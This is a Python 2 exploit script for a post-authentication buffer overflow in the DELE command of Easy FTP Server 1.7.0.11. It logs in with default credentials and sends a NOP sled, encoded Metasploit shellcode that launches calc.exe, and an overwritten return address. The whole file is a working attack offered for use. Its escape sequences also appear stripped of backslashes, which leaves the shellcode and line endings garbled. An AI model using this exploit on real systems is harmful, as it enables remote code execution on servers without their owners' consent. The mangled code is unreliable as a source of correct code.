#
# Note: RNFR, DELE, RMD, STOR commands are have the same offset
#
# Exploit Title: Easy FTP Server v1.7.0.11 DELE Command Remote Buffer Overflow Exploit (Post Auth)
# Date: August 08, 2010
# Author: Glafkos Charalambous
# Version: 1.7.0.11
# Tested on: Windows XP SP3 En

import socket
import sys

if len(sys.argv) != 3:
    print "Usage: ./easyftp_DELE.py <Target IP> <Port>"
    sys.exit(1)
  
target = sys.argv[1]
port = int(sys.argv[2])

buffersize = 268
 

# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe

shellcode = ("xd9xecxbax4cx61x82xbcxd9x74x24xf4x33xc9xb1x33"
"x58x31x50x17x83xe8xfcx03x1cx72x60x49x60x9cxed"
"xb2x98x5dx8ex3bx7dx6cx9cx58xf6xddx10x2ax5axee"
"xdbx7ex4ex65xa9x56x61xcex04x81x4cxcfxa8x0dx02"
"x13xaaxf1x58x40x0cxcbx93x95x4dx0cxc9x56x1fxc5"
"x86xc5xb0x62xdaxd5xb1xa4x51x65xcaxc1xa5x12x60"
"xcbxf5x8bxffx83xedxa0x58x34x0cx64xbbx08x47x01"
"x08xfax56xc3x40x03x69x2bx0ex3ax46xa6x4ex7ax60"
"x59x25x70x93xe4x3ex43xeex32xcax56x48xb0x6cxb3"
"x69x15xeax30x65xd2x78x1ex69xe5xadx14x95x6ex50"
"xfbx1cx34x77xdfx45xeex16x46x23x41x26x98x8bx3e"
"x82xd2x39x2axb4xb8x57xadx34xc7x1exadx46xc8x30"
"xc6x77x43xdfx91x87x86xa4x6exc2x8bx8cxe6x8bx59"
"x8dx6ax2cxb4xd1x92xafx3dxa9x60xafx37xacx2dx77"
"xabxdcx3ex12xcbx73x3ex37xa8x12xacxdbx01xb1x54"
"x79x5e")

 
eip = "x91xC8x41x7E" # CALL EDI - user32.dll
nopsled = "x90" * 16
junk = "x90" * (buffersize-(len(nopsled)+len(shellcode)))
payload = nopsled+shellcode+junk+eip

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((target, port))
    print "[+] Connected"
except:
    print "[!] Connection Failed"
    sys.exit(0)
s.recv(1024)
 	
s.send('User ftprn')
s.recv(1024)
s.send('PASS ftprn')
s.recv(1024)
print "[+] Sending payload..."
s.send('DELE '+payload+'rn')
s.recv(1024)
s.close()